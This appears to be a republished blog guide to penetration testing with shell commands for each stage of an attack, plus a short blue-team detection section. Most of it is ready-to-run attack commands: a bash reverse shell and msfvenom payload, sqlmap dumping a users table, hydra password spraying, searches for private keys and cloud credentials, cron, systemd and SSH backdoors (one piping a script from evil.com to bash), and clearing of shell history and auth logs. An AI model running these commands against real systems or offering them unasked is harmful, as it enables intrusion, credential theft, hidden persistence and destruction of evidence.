Practical Shell Script Guide for Network Security

This guide walks through a complete penetration‑testing workflow, covering information gathering, fast port scanning, service fingerprinting, vulnerability discovery, automated scanning, exploitation, privilege escalation, lateral movement, data exfiltration, persistence techniques, log cleaning, and defensive scripting with concrete command examples for each step.

Cloud Architecture
Cloud Architecture
Cloud Architecture
Practical Shell Script Guide for Network Security

Attack Workflow Overview

Information gathering → asset discovery → vulnerability scanning → exploitation → privilege escalation → lateral movement → persistence → data collection → log cleaning.

1. Information Gathering & Vulnerability Analysis

Port Scanning & Service Identification

Classic tool: nmap. Scans ports, detects service versions, OS, and runs default vulnerability scripts.

# Detect OS, service versions and run default scripts
nmap -sV -O --script=default <target_ip>

Output includes open ports, running services, service versions, OS type, and potential vulnerabilities.

High‑Speed Scanning

For large networks use masscan, which can reach up to 10 million packets per second. masscan 192.168.1.0/24 -p1-65535 --rate=10000 Applicable to internal network scans, internet asset mapping, and large‑scale security audits.

Web Technology Fingerprinting

Tool: WhatWeb. whatweb http://target.com Typical output: Apache 2.4.49, PHP 7.4, WordPress, CDN.

Subdomain Discovery

Tool: subfinder. subfinder -d example.com Example output: api.example.com, dev.example.com, test.example.com.

Exploit Code Search

Tool: searchsploit (queries Exploit‑DB). searchsploit apache 2.4.49 Finds matching exploit code quickly.

2. Automated Vulnerability Scanning

Tool: nuclei, popular for scanning CVEs, weak passwords, misconfigurations, information leaks, and web flaws.

Basic Scan

nuclei -u http://target.com

Critical/High‑Severity Scan

nuclei -l targets.txt -severity critical,high

3. Web Exploitation

SQL Injection Automation

Tool: sqlmap.

sqlmap -u "http://target.com?id=1" --dbs
sqlmap -u "http://target.com?id=1" -D dbname --tables
sqlmap -u "http://target.com?id=1" -D dbname -T users --dump

4. Privilege Escalation & Enumeration

Linux Exploit Suggester

./les2.sh

Analyzes the current kernel version and suggests possible privilege‑escalation exploits.

System Enumeration

Tool: LinEnum. ./LinEnum.sh -t Checks SUID files, environment variables, scheduled jobs, writable files, and sensitive configurations.

Python Privilege Check

Tool: linuxprivchecker. python3 linuxprivchecker.py -w -o loot.txt Outputs a full vulnerability analysis report.

5. Reverse Shell Techniques

Classic Bash reverse shell:

bash -i >& /dev/tcp/your_ip/your_port 0>&1

Listener: nc -lvnp 4444 Payload generation with Metasploit:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell

6. Lateral Movement

Password Spraying

Tool: hydra.

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

Internal Network Attack Tools

Tool: CrackMapExec.

cme smb 192.168.1.0/24
cme smb 192.168.1.0/24 -u admin -p password

7. Data Collection & Sensitive Information Discovery

Search Private Keys

find / -type f -name "id_rsa" 2>/dev/null

Search .env Files

find / -name ".env"

Search Cloud Keys (e.g., AWS)

grep -R "AKIA" .

8. Persistence (Backdoors)

SSH Backdoor

mkdir ~/.ssh
echo "attacker_key" >> ~/.ssh/authorized_keys

Cron Backdoor

crontab -e
*/10 * * * * curl http://evil.com/shell.sh | bash

systemd Service Backdoor

/etc/systemd/system/backdoor.service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

9. Log Cleaning

Clear Bash History

history -c
rm ~/.bash_history

Clear Authentication Logs

echo "" > /var/log/auth.log

10. Blue‑Team Detection Scripts

Detect SSH Brute‑Force Attempts

grep "Failed password" /var/log/auth.log | awk '{print $(11)}' | sort | uniq -c | sort -nr

Detect Suspicious Network Connections

netstat -antp | grep ESTABLISHED

Detect High‑CPU Processes

ps aux --sort=-%cpu | head

List Cron Jobs

crontab -l
/etc/cron*

11. Security Automation Script Example

#!/bin/bash

echo "===== Open Ports ====="
ss -tulnp

echo "===== Network Connections ====="
netstat -antp | grep ESTABLISHED

echo "===== SUID Files ====="
find / -perm -4000 -type f 2>/dev/null

echo "===== Recent Logins ====="
last

Schedule with cron:

crontab -e
0 * * * * /opt/security_scan.sh

Enterprise‑Level Security Toolchain

Recon
 ├─ subfinder
 ├─ masscan
 ├─ nmap

Vulnerability
 ├─ nuclei
 ├─ sqlmap

Exploit
 ├─ metasploit
 ├─ exploit-db

Post Exploit
 ├─ linpeas
 ├─ linenum

Lateral Movement
 ├─ hydra
 ├─ crackmapexec

Persistence
 ├─ ssh backdoor
 ├─ cron backdoor

Core Practical Principles

Legal Authorization

All security testing must have explicit permission; unauthorized attacks are illegal.

Understand Underlying Concepts

Grasp network protocols, Linux privilege model, system logging, and vulnerability mechanics rather than merely copying commands.

Continuous Updating

New vulnerabilities appear constantly.

Attack techniques evolve.

Defensive technologies improve.

Attack‑Defense Integration

Effective defense stems from understanding attacker tools and scripts, enabling security engineers to design robust detection and protection mechanisms.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

Automationnetwork securityshell scriptingSQLMappenetration testingNmapMetasploitMasscan
Cloud Architecture
Written by

Cloud Architecture

Focuses on cloud‑native and distributed architecture engineering, sharing practical solutions and lessons learned. Covers microservice governance, Kubernetes, observability, and stability engineering to help your systems run stable, fast, and cost‑effectively.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.